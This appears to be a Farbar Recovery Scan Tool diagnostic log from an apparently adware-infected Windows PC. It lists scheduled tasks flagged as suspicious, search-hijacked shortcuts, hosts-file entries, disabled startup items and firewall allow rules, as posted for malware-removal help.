(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge (2).lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,"
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
==================== Loaded Modules (Whitelisted) ==============
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 23:13 - 2015-09-10 01:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService =>
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe" -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{DCB933B0-7F4D-454F-AC6A-1E854FAE7247}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{9A607EBD-98B0-4DF0-8832-162C6520DD96}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C2050471-EF7B-454E-BAD7-031B8C799034}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{26946E3E-72F1-4A5C-928D-74383A9063F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{BB357A36-3CB3-42AA-9482-3F82B3FBF5B6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{F5A9A71E-E542-4B60-AC88-407CF349333D}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{6DFDF484-35F7-4560-806F-3D534DDC2B99}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{89BB93BD-D481-4B92-B90D-3BE936589FAE}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{5A121057-400D-4F36-8298-4F9AF137952B}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{3E527C67-8AFB-4CE0-8CE4-B6A32ABC7746}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{81FF04D0-1773-4D9A-B5C8-968B7598EB18}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{9F08737F-5B12-4519-92BF-D00087D34BB5}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{BB182CB8-8875-4B4D-9B6D-F473006EE41C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5FDCDFBB-4E64-4094-9759-EE002B6FFE85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{84B7E979-84E3-4C39-A80B-BD495552BF32}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1DDD067C-DEBB-4C88-B5D4-D745459DD54D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7B1D4FC6-DA08-4C98-8AFA-1334AD39B3D2}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{C717ECD5-2072-4B28-AB16-A10FE79A6747}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{A63643D2-7DB5-45C0-815B-0BC12A98D7DB}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FAF34DC7-FE08-41E6-B320-A00C22ADF40A}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{BA9DADD6-12A8-4990-84DA-ECA69E4AA620}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{CA37E765-C7C0-4281-A08F-8FBDCDE18C87}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{89BF33C2-1135-4A44-9001-EAEE8DB8C080}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{61DF9056-88E2-4465-8B1E-17205E0B3AD9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{9274EE06-3B2C-469C-AC6B-8B3E4A10C4F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{35EF7245-A384-4B7E-9B89-637569982991}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{B977E4D9-F7AC-45A2-B90D-5DDF575DB3BA}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [UDP Query User{7C597374-95E2-4417-A87A-71B539C01019}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [TCP Query User{9788F4B3-41F7-4EA5-B1E2-D19F666BA212}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [{E248708E-EA33-4BF1-A171-A713ADDD2941}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\Kernel\CLML\VDTVRec.exe
FirewallRules: [{65210182-2E03-4646-BBD6-9F96C2918788}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\VDTV.exe
FirewallRules: [{F1CC8CBC-6754-4E6A-99A0-F76940155FCA}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\DIRECTV2PC.exe
FirewallRules: [UDP Query User{2DE0EB4D-0CA1-455B-A108-E0E24BFD44D3}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [TCP Query User{B68FF020-2C6B-4B79-8D45-0DC50FC42D25}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [UDP Query User{AFD0A82C-C4E1-4E73-90C0-07802FC353B5}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{598AD19C-0B0E-445B-BB74-0880AFE78AED}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{D3F472F7-4BC3-4FE8-9A87-D9BA9CB10426}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{69B5A1AB-8D48-493A-9CE5-921246FF99B5}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{C14CC1E9-D19E-445F-B5A4-CF287A85B2CD}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{40387BB8-F0FE-42C1-A9BF-5055B9101901}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{E8C806F4-FCF2-4D38-96BB-E79901D6BF50}] => (Allow) C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [UDP Query User{E5F5F020-2D99-4CCC-B65D-967BE23F08C9}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{B460AF68-0916-4A9D-845A-A4B0616D9390}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{37444A00-F2A0-41C0-9FA9-826095DE3B32}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{DE6ED13C-B642-4492-BDC8-0E5DB99C1E00}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [UDP Query User{4C7104F5-63FB-438C-823D-A35A400624B0}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [TCP Query User{E114CBFB-489F-4CF7-A7FE-D25369C364E9}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [UDP Query User{E71F51CE-C614-4210-8EAB-E66DA6406E71}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [TCP Query User{8AA57984-68B3-45DC-8119-097D6F88D2B9}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [{5E956ABE-03F0-40F0-B5FD-A72327901ECB}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{DBE93BD7-16AE-4F98-8258-2527D6470650}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\DeviceSetup.exe
FirewallRules: [{089AD9AE-AC83-406D-9990-40CFFB6A2530}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C5B9CBB7-FE93-4953-9BDA-18EB5FB1CEC3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{28027EB1-3CD1-4AB9-9181-D5BE253524A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{60462D02-9714-4CAC-B848-189CF26E9EE6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{48094F2A-771F-461B-9BD5-8B359CAFA391}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{3F8CF68A-FABB-42CD-81A0-BB6DECC7CB42}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [UDP Query User{C7C2327C-D3C1-41C5-AB41-DEE0EEC21AAA}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{E438E8F6-1BE1-467A-A785-C0CB554B86A5}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{E596C476-1196-40F8-BFE6-B824FE54A20B}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{C7758164-0B81-4791-889E-300E02DDD3A1}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [{2D65E536-5186-4C6E-9096-F61DA03C28C7}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{B0809214-275E-4E04-90A3-D518576DC9B1}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{561A074B-345A-4717-95D2-2E76E4E1F07E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{56D831B4-E1DA-46C5-AEBA-E99CF56D64C5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{24AEF387-0CDA-424A-8BF0-C2BA9883AB8E}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{EB7139D0-3153-4828-9815-172088552B9C}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [UDP Query User{7392B614-972A-4972-B8F8-28749440D789}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [TCP Query User{DDA9B4CD-3DF1-4469-B3FE-070EF7A86EC6}C:\program files (x86)\google\google earth\plugin\geplugin.exe] => (Allow) C:\program files (x86)\google\google earth\plugin\geplugin.exe
FirewallRules: [UDP Query User{34E14A01-F9E8-4267-8EA7-E3C3B20793D1}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{8FAF2E1A-7C1C-46B6-8A24-DDFF6F3CB587}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{3927FDEE-D203-49B2-86FB-1C0E7F9A4D35}] => (Allow) C:\Program Files (x86)\Skype\Plugin Manager\skypePM.exe
FirewallRules: [{417BB503-D3CA-42F3-AE78-42BC29D734BF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
